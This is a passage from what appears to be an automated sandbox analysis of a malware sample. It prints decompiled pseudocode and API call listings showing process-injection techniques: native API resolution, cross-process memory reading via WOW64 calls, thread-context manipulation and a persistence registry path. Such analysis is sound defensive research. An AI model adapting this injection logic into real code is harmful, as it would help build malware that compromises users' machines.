					_t37 = E00401D9F(_a4, _t55, _t52,  &_v8);
					_t52 = _v24;
					if(_t37 != 0 || _v4 >= _t52) {
						break;
					}
					_v4 = _t52;
					VirtualFree(_t55, 0, 0x8000);
					_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
					if(_t55 != 0) {
						continue;
					}
					break;
				}
				if(_t55 == 0 || _v4 < _t52) {
					goto L15;
				} else {
					_a4 = _a4 & 0x00000000;
					_t14 = _t55 + 8; // 0x8
					_t53 = _t14;
					if( *_t55 <= 0) {
						goto L16;
					}
					while(1) {
						_t48 = ( *(_t53 + 0x1e) & 0x0000ffff) + _t53 + 0x20;
						if(lstrcmpiA(_t48, ?str?) == 0) {
							break;
						}
						_t42 = StrChrA(_t48, 0x2e);
						if(_t42 == 0) {
							L11:
							_t53 = _t53 + 0x120;
							_v0 = _v0 + 1;
							if(_v0 <  *_t55) {
								continue;
							}
							goto L16;
						}
						 *_t42 = 0;
						if(lstrcmpiA(_t48, ?str?) == 0) {
							break;
						}
						goto L11;
					}
					_t40 = _a8;
					_v12 = _v12 & 0x00000000;
					 *_t40 =  *((intOrPtr*)(_t53 + 8));
					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t53 + 0xc));
					_t41 = _a12;
					if(_t41 != 0) {
						 *_t41 =  *((intOrPtr*)(_t53 + 0x10));
					}
					goto L16;
				}
			}

















    0x0040232f
    0x00402337
    0x0040233c
    0x00402350
    0x00402356
    0x0040235a
    0x00402426
    0x00402426
    0x0040242e
    0x00402430
    0x0040243a
    0x0040243a
    0x0040244b
    0x00000000
    0x00000000
    0x00000000
    0x00402360
    0x00402360
    0x0040236b
    0x00402372
    0x00402376
    0x00000000
    0x00000000
    0x00402386
    0x0040238a
    0x00402398
    0x0040239c
    0x00000000
    0x00000000
    0x00000000
    0x0040239c
    0x004023a0
    0x00000000
    0x004023ac
    0x004023ac
    0x004023b4
    0x004023b4
    0x004023b7
    0x00000000
    0x00000000
    0x004023bf
    0x004023c3
    0x004023d1
    0x00000000
    0x00000000
    0x004023d6
    0x004023de
    0x004023ef
    0x004023ef
    0x004023f5
    0x004023ff
    0x00000000
    0x00000000
    0x00000000
    0x00402401
    0x004023e6
    0x004023ed
    0x00000000
    0x00000000
    0x00000000
    0x004023ed
    0x00402406
    0x0040240a
    0x0040240f
    0x00402414
    0x00402417
    0x0040241d
    0x00402422
    0x00402422
    0x00000000
    0x0040241d

    APIs
      • Part of subcall function 00401D9F: GetProcAddress.KERNEL32(ZwWow64QueryInformationProcess64,00000318,00000000,00000000), ref: 00401DBD
      • Part of subcall function 00401D9F: StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 00401F43
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402354
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,00000000), ref: 0040238A
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402396
    • lstrcmpiA.KERNEL32(?,NTDLL.DLL,?,00000000,00000000,00000000), ref: 004023CD
    • StrChrA.SHLWAPI(?,0000002E), ref: 004023D6
    • lstrcmpiA.KERNEL32(?,NTDLL.DLL), ref: 004023E9
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0040243A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A1422, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83memorystring
    APIs
    • lstrlen.KERNEL32(@CODE@,00000000,?,00001000,012AA03C), ref: 012A145E
    • RtlAllocateHeap.NTDLL(00000000,?), ref: 012A148E
    • memcpy.NTDLL(00000000,00001000,00000000), ref: 012A14A0
    • memcpy.NTDLL(0000000B,00001000,00000000,00000000,00001000,00000000), ref: 012A14B1
    • memcpy.NTDLL(00000000,00000000,?,0000000B,00001000,00000000,00000000,00001000,00000000), ref: 012A14CB
    • HeapFree.KERNEL32(00000000,00001000), ref: 012A14DC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A174A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135string
    APIs
    • StrChrA.SHLWAPI(?,0000005F), ref: 012A177F
    • memcpy.NTDLL(?,?,?), ref: 012A1796
    • lstrcpy.KERNEL32(?), ref: 012A17AD
      • Part of subcall function 012A4387: lstrlen.KERNEL32(?,00000000,?,00000000,012A1BD9,?,00000000,?,00000000,?,?,012A1D55), ref: 012A4390
      • Part of subcall function 012A4387: mbstowcs.NTDLL ref: 012A43B7
      • Part of subcall function 012A4387: memset.NTDLL ref: 012A43C9
      • Part of subcall function 012A25A8: SafeArrayCreate.OLEAUT32(00000011,00000001,012AC9E8), ref: 012A25D0
      • Part of subcall function 012A25A8: memcpy.NTDLL(?,012A1C21,00000008), ref: 012A25EA
      • Part of subcall function 012A25A8: SafeArrayDestroy.OLEAUT32(012A1D55), ref: 012A2616
      • Part of subcall function 012A16D5: lstrlen.KERNEL32(012AB2BC,80000003,?,012A1874,?,?,80000003,?,?,012AC797,80000003,00000000), ref: 012A16DE
      • Part of subcall function 012A16D5: lstrlenW.KERNEL32(?), ref: 012A16EA
      • Part of subcall function 012A16D5: RtlAllocateHeap.NTDLL(00000000,000000E6), ref: 012A1702
      • Part of subcall function 012A16D5: memcpy.NTDLL(00000000,012AC7BC,0000000E), ref: 012A1716
    • lstrcpy.KERNEL32(?,012AC6BE), ref: 012A1881
      • Part of subcall function 012A2544: SysAllocString.OLEAUT32(?), ref: 012A255E
      • Part of subcall function 012A2544: SysFreeString.OLEAUT32(00000000), ref: 012A2595
      • Part of subcall function 012A2466: memcpy.NTDLL(00000000,?,?,?,?,80000003,?,012AC290,?,012AC0DC,?,80000003,?,00000000), ref: 012A24CC
      • Part of subcall function 012A2466: SafeArrayDestroy.OLEAUT32(?), ref: 012A24E6
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012AE30B, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 105memorystring
    APIs
    • lstrcpyn.KERNEL32(?,004040BC,00000008), ref: 012AE339
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 012AE3AC
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000001), ref: 012AE40E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428653558.012AE000.00000040.sdmp, Offset: 012AE000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12ae000_payload.jbxd
    Function 012A1348, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 82string
    APIs
      • Part of subcall function 012A3ED0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012A3F1F
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • wsprintfA.USER32 ref: 012A13CC
    • lstrlen.KERNEL32(Software\AppDataLow\Software\Microsoft\), ref: 012A13DB
    • lstrcpy.KERNEL32(00000000,Software\AppDataLow\Software\Microsoft\), ref: 012A13F5
    • lstrcat.KERNEL32(00000000,00000000), ref: 012A13FD
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A3887, Relevance: 7.5, APIs: 5, Instructions: 35
    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,012A1061,?), ref: 012A388F
    • GetVersion.KERNEL32 ref: 012A389E
    • GetCurrentProcessId.KERNEL32 ref: 012A38B5
    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 012A38D2
    • GetLastError.KERNEL32 ref: 012A38F1
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012AE48E, Relevance: 6.1, APIs: 4, Instructions: 68file
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012AE4DE
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?), ref: 012AE4F0
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 012AE508
    • CloseHandle.KERNEL32(?), ref: 012AE523
    Memory Dump Source
    • Source File: 00000001.00000002.22428653558.012AE000.00000040.sdmp, Offset: 012AE000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12ae000_payload.jbxd
    Function 012A47D7, Relevance: 6.1, APIs: 4, Instructions: 61memorystring
    APIs
    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,012A49A4,00000000,?,?,012A4B6B,?,012AB2A4), ref: 012A47E2
    • RtlAllocateHeap.NTDLL(00000000,?), ref: 012A47FA
    • memcpy.NTDLL(00000000,012AB2A4,-00000008,?,?,?,012A49A4,00000000,?,?,012A4B6B,?,012AB2A4), ref: 012A483E
    • memcpy.NTDLL(00000001,012AB2A4,00000001,012A4B6B,?,012AB2A4), ref: 012A485F
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 004012AC, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43
    C-Code - Quality: 80%
    			E004012AC(signed int __edx, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v8;
				void* _v20;
				void* __esi;
				signed int _t5;
				signed int _t7;
				signed int _t10;
				signed int _t12;
				signed int _t15;
				signed int _t17;
				void* _t19;
				void* _t20;
				signed int _t21;
				void* _t22;
				void* _t23;

				_t21 = __edx;
				_t5 =  *0x40545c; // 0x0
				_t23 = 0;
				if((_t5 |  *0x405460) == 0) {
					L3:
					_t23 = 0x7f;
					_push("LdrLoadDll");
					_push(_a8);
					_t7 = E0040244E(_t19, _t20, _t22, _t23, _t28);
					 *0x40545c = _t7;
					_t29 = _t7 | _t21;
					 *0x405460 = _t21;
					if((_t7 | _t21) != 0) {
						_push("LdrGetProcedureAddress");
						_push(_v0);
						_t10 = E0040244E(_t19, _t20, _t22, _t23, _t29);
						 *0x405464 = _t10;
						_t30 = _t10 | _t21;
						 *0x405468 = _t21;
						if((_t10 | _t21) != 0) {
							_push("ZwProtectVirtualMemory");
							_push(_v8);
							_t12 = E0040244E(_t19, _t20, _t22, _t23, _t30);
							 *0x40546c = _t12;
							 *0x405470 = _t21;
							if((_t12 | _t21) != 0) {
								_t23 = 0;
								goto L7;
							}
						}
					}
				} else {
					_t15 =  *0x405464; // 0x0
					if((_t15 |  *0x405468) == 0) {
						goto L3;
					} else {
						_t17 =  *0x40546c; // 0x0
						_t28 = _t17 |  *0x405470;
						if((_t17 |  *0x405470) != 0) {
							L7:
							memcpy(_v20, 0x40545c, 0x18);
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}


















    0x004012ac
    0x004012ac
    0x004012b2
    0x004012ba
    0x004012d6
    0x004012d8
    0x004012d9
    0x004012de
    0x004012e2
    0x004012e7
    0x004012ec
    0x004012ee
    0x004012f4
    0x004012f6
    0x004012fb
    0x004012ff
    0x00401304
    0x00401309
    0x0040130b
    0x00401311
    0x00401313
    0x00401318
    0x0040131c
    0x00401321
    0x00401328
    0x0040132e
    0x00401330
    0x00000000
    0x00401330
    0x0040132e
    0x00401311
    0x004012bc
    0x004012bc
    0x004012c7
    0x00000000
    0x004012c9
    0x004012c9
    0x004012ce
    0x004012d4
    0x00401332
    0x0040133d
    0x00000000
    0x00000000
    0x00000000
    0x004012d4
    0x004012c7
    0x00401348

    APIs
      • Part of subcall function 0040244E: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,00404118,00000030,00401FD9,ZwGetContextThread,?,0040206F,?,00000318,00000008), ref: 0040248A
      • Part of subcall function 0040244E: VirtualFree.KERNEL32(?,00000000,00008000,00000010,?,?,00404118,00000030,00401FD9,ZwGetContextThread,?,0040206F,?,00000318,00000008), ref: 00402513
    • memcpy.NTDLL(?,0040545C,00000018,?,ZwProtectVirtualMemory,?,LdrGetProcedureAddress,?,LdrLoadDll,?,0040151D,?,?,?,?,00000000), ref: 0040133D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A16D5, Relevance: 6.0, APIs: 4, Instructions: 38memorystring
    APIs
    • lstrlen.KERNEL32(012AB2BC,80000003,?,012A1874,?,?,80000003,?,?,012AC797,80000003,00000000), ref: 012A16DE
    • lstrlenW.KERNEL32(?), ref: 012A16EA
    • RtlAllocateHeap.NTDLL(00000000,000000E6), ref: 012A1702
    • memcpy.NTDLL(00000000,012AC7BC,0000000E), ref: 012A1716
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012AE297, Relevance: 6.0, APIs: 4, Instructions: 38
    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 012AE2A6
    • GetVersion.KERNEL32 ref: 012AE2B5
    • GetCurrentProcessId.KERNEL32 ref: 012AE2CC
    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 012AE2E5
    Memory Dump Source
    • Source File: 00000001.00000002.22428653558.012AE000.00000040.sdmp, Offset: 012AE000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12ae000_payload.jbxd
    Function 012A4590, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemory
    APIs
    • RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A4599
    • Sleep.KERNEL32(0000000A,?,?,00000000,pnls,?,00000000,pnls,?,?,?,012A1F20,00000058,00000000,00000000), ref: 012A45A3
    • HeapFree.KERNEL32(00000000,00000000), ref: 012A45CB
      • Part of subcall function 012A4420: StrTrimA.SHLWAPI(?,012AA274), ref: 012A4459
      • Part of subcall function 012A4420: StrTrimA.SHLWAPI(00000001,012AA274), ref: 012A4476
    • RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A45E7
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A10D5, Relevance: 6.0, APIs: 4, Instructions: 29memory
    APIs
    • SetEvent.KERNEL32(012AB200), ref: 012A10E0
    • SleepEx.KERNEL32(00000064,00000001), ref: 012A10EF
    • CloseHandle.KERNEL32(012AB200), ref: 012A1110
    • HeapDestroy.KERNEL32(012AB1D0), ref: 012A1120
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A46AE, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemory
    APIs
    • RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A46B7
    • Sleep.KERNEL32(0000000A,?,?,00000000,pnls,?,00000000,pnls,?,?,?,012A1F20,00000058,00000000,00000000), ref: 012A46C1
    • HeapFree.KERNEL32(00000000), ref: 012A46EF
    • RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4704
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 00401D9F, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166libraryloader
    C-Code - Quality: 81%
    			E00401D9F(intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v84;
				char _v92;
				void* __esi;
				_Unknown_base(*)()* _t80;
				intOrPtr* _t81;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t94;
				signed int* _t95;
				unsigned int _t102;
				intOrPtr _t104;
				signed int _t105;
				char* _t107;
				signed int _t109;
				signed int* _t111;
				char _t124;
				void* _t125;
				intOrPtr* _t127;
				intOrPtr _t128;
				unsigned int _t131;

				_v24 = _v24 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t109 = 0;
				_t80 = GetProcAddress( *0x4054c4, "ZwWow64QueryInformationProcess64");
				if(_t80 == 0) {
					L23:
					_t81 = _a16;
					if(_t81 != 0) {
						 *_t81 = _t109;
					}
					if(_t109 <= _a12 && _t109 != 0) {
						_v24 = 1;
					}
					return _v24;
				}
				_push( &_v8);
				_push(0x30);
				_push( &_v92);
				_push(0);
				_push(_a4);
				if( *_t80() < 0) {
					goto L23;
				}
				_t84 = E00401046(0x200);
				_v20 = _t84;
				if(_t84 == 0) {
					goto L23;
				}
				_t125 = E00401046(0x100);
				if(_t125 == 0) {
					L21:
					E0040105B(_v20);
					if(_t125 != 0) {
						E0040105B(_t125);
					}
					goto L23;
				}
				_t88 = E00401D4B( &_v92,  &_v84, _a4, _t125, 0x28);
				_v8 = _t88;
				if(_t88 == 0) {
					goto L21;
				}
				_t12 = _t125 + 0x28; // 0x28
				_t14 = _t125 + 0x18; // 0x18
				_t127 = _t14;
				_t90 = E00401D4B( &_v92, _t127, _a4, _t12, 0x40);
				_v8 = _t90;
				if(_t90 == 0) {
					goto L21;
				}
				_t114 =  *(_t127 + 4);
				_t124 =  *((intOrPtr*)(_t125 + 0x38));
				_t128 =  *((intOrPtr*)(_t125 + 0x3c));
				_t92 =  *_t127 + 0x10;
				asm("adc ecx, ebx");
				_t111 =  &(_a8[2]);
				_v44 = _t92;
				_v40 = _t114;
				_v36 = _t124;
				_v32 = _t128;
				_v16 = 4;
				if(_t124 != _t92 || _t128 != _t114) {
					while(1) {
						_t25 = _t125 + 0x68; // 0x68
						_t94 = E00401D4B(_t114,  &_v36, _a4, _t25, 0x98);
						_v8 = _t94;
						if(_t94 == 0) {
							goto L18;
						}
						_v16 = _v16 + 0x120;
						_v36 =  *((intOrPtr*)(_t125 + 0x68));
						_v32 =  *((intOrPtr*)(_t125 + 0x6c));
						if(_v16 > _a12) {
							L16:
							if(_v36 != _v44 || _v32 != _v40) {
								continue;
							} else {
								goto L18;
							}
						}
						_t111[6] = _v12;
						_t111[5] =  *(_t125 + 0xd0);
						_t111[7] =  *((intOrPtr*)(_t125 + 0xd4));
						_t111[4] =  *(_t125 + 0xa8);
						_t102 = ( *(_t125 + 0xb0) & 0x0000ffff) >> 1;
						_t111[2] =  *(_t125 + 0x98);
						_t114 =  *(_t125 + 0x9c);
						_v28 = _t102;
						_t111[3] =  *(_t125 + 0x9c);
						if(_t102 >= 0x100) {
							L15:
							_t111 =  &(_t111[0x48]);
							_v12 = _v12 + 1;
							goto L16;
						}
						_t53 = _t125 + 0xb8; // 0xb8
						_t104 = E00401D4B(_t114, _t53, _a4, _v20,  *(_t125 + 0xb0) & 0x0000ffff);
						_v8 = _t104;
						if(_t104 == 0) {
							goto L15;
						}
						_t131 = _v28;
						_t105 = 0;
						if(_t131 <= 0) {
							L14:
							_t62 =  &(_t111[8]); // 0x18
							( &(_t111[8]))[_t131] = 0;
							_t107 = StrRChrA(_t62, 0, 0x5c);
							_t114 = 0xffe1 - _t111;
							_t111[7] =  &(_t107[0xffe1]);
							goto L15;
						} else {
							goto L13;
						}
						do {
							L13:
							 *((char*)(_t111 + _t105 + 0x20)) =  *((intOrPtr*)(_v20 + _t105 * 2));
							_t105 = _t105 + 1;
						} while (_t105 < _t131);
						goto L14;
					}
					goto L18;
				} else {
					L18:
					_t95 = _a8;
					if(_t95 != 0) {
						 *_t95 = _v12;
					}
					_t109 = _v16;
					goto L21;
				}
			}



































    0x00401da5
    0x00401da9
    0x00401dbb
    0x00401dbd
    0x00401dc5
    0x00401f98
    0x00401f98
    0x00401f9d
    0x00401f9f
    0x00401f9f
    0x00401fa4
    0x00401faa
    0x00401faa
    0x00401fb8
    0x00401fb8
    0x00401dce
    0x00401dcf
    0x00401dd4
    0x00401dd5
    0x00401dd6
    0x00401ddd
    0x00000000
    0x00000000
    0x00401de8
    0x00401def
    0x00401df2
    0x00000000
    0x00000000
    0x00401e02
    0x00401e06
    0x00401f86
    0x00401f89
    0x00401f90
    0x00401f93
    0x00401f93
    0x00000000
    0x00401f90
    0x00401e15
    0x00401e1c
    0x00401e1f
    0x00000000
    0x00000000
    0x00401e27
    0x00401e2e
    0x00401e2e
    0x00401e31
    0x00401e38
    0x00401e3b
    0x00000000
    0x00000000
    0x00401e43
    0x00401e46
    0x00401e49
    0x00401e4c
    0x00401e4f
    0x00401e54
    0x00401e59
    0x00401e5c
    0x00401e5f
    0x00401e62
    0x00401e65
    0x00401e6c
    0x00401e76
    0x00401e7b
    0x00401e85
    0x00401e8c
    0x00401e8f
    0x00000000
    0x00000000
    0x00401e98
    0x00401e9f
    0x00401ea5
    0x00401eae
    0x00401f5f
    0x00401f65
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00401f65
    0x00401ebf
    0x00401ec9
    0x00401ed3
    0x00401edd
    0x00401ee6
    0x00401eed
    0x00401ef0
    0x00401ef6
    0x00401ef9
    0x00401efc
    0x00401f56
    0x00401f56
    0x00401f5c
    0x00000000
    0x00401f5c
    0x00401f09
    0x00401f12
    0x00401f19
    0x00401f1c
    0x00000000
    0x00000000
    0x00401f1e
    0x00401f21
    0x00401f25
    0x00401f36
    0x00401f3a
    0x00401f3e
    0x00401f43
    0x00401f4e
    0x00401f52
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00401f27
    0x00401f27
    0x00401f2d
    0x00401f31
    0x00401f32
    0x00000000
    0x00401f27
    0x00000000
    0x00401f77
    0x00401f77
    0x00401f77
    0x00401f7c
    0x00401f81
    0x00401f81
    0x00401f83
    0x00000000
    0x00401f83

    APIs
    • GetProcAddress.KERNEL32(ZwWow64QueryInformationProcess64,00000318,00000000,00000000), ref: 00401DBD
      • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,0040272F,?,?,00000000,?,00000006,00000006,?,00401128,?,?,736C6E70,?,00000000), ref: 00401052
    • StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 00401F43
      • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,0040275E), ref: 00401067
      • Part of subcall function 00401D4B: GetProcAddress.KERNEL32(ZwWow64ReadVirtualMemory64,00000000,?,?,?,00401E1A,00000000,00000000,00000028,00000100,00000200), ref: 00401D6D
    Strings
    • ZwWow64QueryInformationProcess64, xrefs: 00401DB0
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 0040203C, Relevance: 5.1, APIs: 4, Instructions: 109
    C-Code - Quality: 41%
    			E0040203C(void* __ecx, intOrPtr __edx, intOrPtr* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v984;
				intOrPtr _v988;
				signed int _v1112;
				intOrPtr _v1116;
				intOrPtr _v1188;
				void _v1228;
				int _v1232;
				char _v1236;
				char _v1240;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _t41;
				char* _t42;
				long _t50;
				intOrPtr _t51;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;

				_t68 = __esi;
				_t64 = __edx;
				_t61 = __ecx;
				_t59 = _a4;
				_v1236 = 0;
				_v1232 = 0;
				memset( &_v1228, 0, 0x4c8);
				_t66 = E00401FBB(_t64);
				_t5 = _t68 + 0x218; // 0x218
				_v1188 = 0x100003;
				memcpy(_t5, E00402C5D, 0x100);
				_t41 = E00402603(_t61,  *_t59);
				_v1260 = _t41;
				if(_t41 != 0) {
					_t42 =  &_v1236;
					asm("cdq");
					_push(_t64);
					_push(_t42);
					_v1252 = _t42;
					_v1248 = _t64;
					asm("cdq");
					_push(_t64);
					_push( *((intOrPtr*)(_t59 + 4)));
					_push(0);
					_push(2);
					_push( *((intOrPtr*)(_t66 + 4)));
					_push( *_t66);
					if(E00402BF0() >= 0) {
						_t14 = _t68 + 0x18; // 0x18
						asm("cdq");
						if( *((intOrPtr*)(__esi + 0x10)) == _t14 &&  *((intOrPtr*)(__esi + 0x14)) == _t64) {
							asm("adc ecx, ecx");
							 *((intOrPtr*)(__esi + 0x10)) = _v1256 + 0x18;
							 *((intOrPtr*)(__esi + 0x14)) = 0;
						}
						 *_t68 = _v988;
						 *((intOrPtr*)(_t68 + 4)) = _v984;
						if(E004025C0( *_t59, _v1256, _t68,  &_v1240) == 0) {
							goto L11;
						} else {
							_t51 = _v1256;
							_push(_v1248);
							_v1112 = _v1112 & 0x00000000;
							_push(_v1252);
							_v1116 = _t51;
							asm("cdq");
							_v988 = _t51 + 0x218;
							_v984 = _t64;
							asm("cdq");
							_push(_t64);
							_push( *((intOrPtr*)(_t59 + 4)));
							_push(0);
							_push(2);
							_push( *((intOrPtr*)(_t66 + 0xc)));
							_push( *((intOrPtr*)(_t66 + 8)));
							if(E00402BF0() < 0) {
								goto L3;
							} else {
								_t50 = 0;
								goto L10;
							}
						}
					} else {
						L3:
						_t50 = 5;
					}
				} else {
					_t50 = GetLastError();
					L10:
					if(_t50 == 0xffffffff) {
						L11:
						_t50 = GetLastError();
					}
				}
				return _t50;
			}

























    0x0040203c
    0x0040203c
    0x0040203c
    0x00402049
    0x00402055
    0x00402059
    0x00402062
    0x00402074
    0x00402076
    0x00402082
    0x0040208a
    0x00402094
    0x0040209b
    0x0040209f
    0x004020ac
    0x004020b0
    0x004020b1
    0x004020b2
    0x004020b3
    0x004020ba
    0x004020be
    0x004020bf
    0x004020c0
    0x004020c1
    0x004020c3
    0x004020c5
    0x004020c8
    0x004020d4
    0x004020e1
    0x004020e4
    0x004020e7
    0x004020f9
    0x004020fb
    0x004020fe
    0x004020fe
    0x00402108
    0x00402111
    0x00402127
    0x00000000
    0x00402129
    0x00402129
    0x0040212d
    0x00402131
    0x00402139
    0x0040213d
    0x00402149
    0x0040214a
    0x00402154
    0x0040215b
    0x0040215c
    0x0040215d
    0x0040215e
    0x00402160
    0x00402162
    0x00402165
    0x00402172
    0x00000000
    0x00402178
    0x00402178
    0x00000000
    0x00402178
    0x00402172
    0x004020d6
    0x004020d6
    0x004020d8
    0x004020d8
    0x004020a1
    0x004020a1
    0x0040217a
    0x0040217d
    0x0040217f
    0x0040217f
    0x0040217f
    0x0040217d
    0x0040218a

    APIs
    • memset.NTDLL ref: 00402062
    • memcpy.NTDLL ref: 0040208A
      • Part of subcall function 00402603: RtlNtStatusToDosError.NTDLL(00000000), ref: 0040263B
      • Part of subcall function 00402603: SetLastError.KERNEL32(00000000), ref: 00402642
    • GetLastError.KERNEL32(00000010,00000218,00402C5D,00000100,?,00000318,00000008), ref: 004020A1
      • Part of subcall function 004025C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 004025F0
      • Part of subcall function 004025C0: SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004025F7
    • GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,00402C5D,00000100), ref: 0040217F
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
